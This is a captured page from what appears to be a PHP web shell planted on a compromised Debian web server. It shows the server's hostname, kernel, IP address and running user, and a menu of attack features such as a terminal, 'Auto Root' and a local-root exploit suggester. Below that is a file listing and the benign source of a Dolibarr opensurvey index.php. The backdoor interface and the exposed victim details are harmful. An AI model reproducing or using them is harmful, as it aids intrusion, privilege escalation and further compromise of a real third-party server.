Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gf.bdcloud.fr /
opensurvey /
Delete
Unzip
Name
Size
Permission
Date
Action
class
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
css
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
img
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
wizard
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
card.php
13.3
KB
-rw-r--r--
2020-10-12 13:32
exportcsv.php
3.12
KB
-rw-r--r--
2020-10-12 13:32
fonctions.php
8.61
KB
-rw-r--r--
2020-10-12 13:32
index.php
2.68
KB
-rw-r--r--
2020-10-12 13:32
list.php
20.14
KB
-rw-r--r--
2020-10-12 13:32
results.php
34.36
KB
-rw-r--r--
2020-10-12 13:32
Save
Rename
<?php /* Copyright (C) 2013-2014 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2019 Nicolas ZABOURI <info@inovea-conseil.com> * Copyright (C) 2019 Frédéric France <frederic.france@netlogic.fr> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/opensurvey/index.php * \ingroup opensurvey * \brief Home page of opensurvey area */ require '../main.inc.php'; require_once DOL_DOCUMENT_ROOT."/core/lib/admin.lib.php"; require_once DOL_DOCUMENT_ROOT."/core/lib/files.lib.php"; // Load translation files required by the page $langs->load("opensurvey"); // Security check if (!$user->rights->opensurvey->read) accessforbidden(); $hookmanager = new HookManager($db); // Initialize technical object to manage hooks. Note that conf->hooks_modules contains array $hookmanager->initHooks(array('opensurveyindex')); /* * View */ $nbsondages = 0; $sql = 'SELECT COUNT(*) as nb'; $sql .= ' FROM '.MAIN_DB_PREFIX.'opensurvey_sondage'; $sql .= ' WHERE entity IN ('.getEntity('survey').')'; $resql = $db->query($sql); if ($resql) { $obj = $db->fetch_object($resql); $nbsondages = $obj->nb; } else dol_print_error($db, ''); $title = $langs->trans("OpenSurveyArea"); llxHeader('', $title); print load_fiche_titre($title, '', 'poll'); print '<div class="fichecenter"><div class="fichethirdleft">'; print '<div class="div-table-responsive-no-min">'; print '<table class="noborder centpercent">'; print '<tr class="liste_titre"><td colspan="2">'.$langs->trans("OpenSurveyArea").'</td></tr>'; print '<tr class="oddeven">'; print '<td>'.$langs->trans("NbOfSurveys").'</td><td class="right"><a href="list.php">'.$nbsondages.'</a></td>'; print "</tr>"; //print '<tr class="liste_total"><td>'.$langs->trans("Total").'</td><td class="right">'; //print $total; //print '</td></tr>'; print '</table>'; print '</div>'; print '</div></div>'; $parameters = array('user' => $user); $reshook = $hookmanager->executeHooks('dashboardOpenSurvey', $parameters, $object); // Note that $action and $object may have been modified by hook // End of page llxFooter(); $db->close();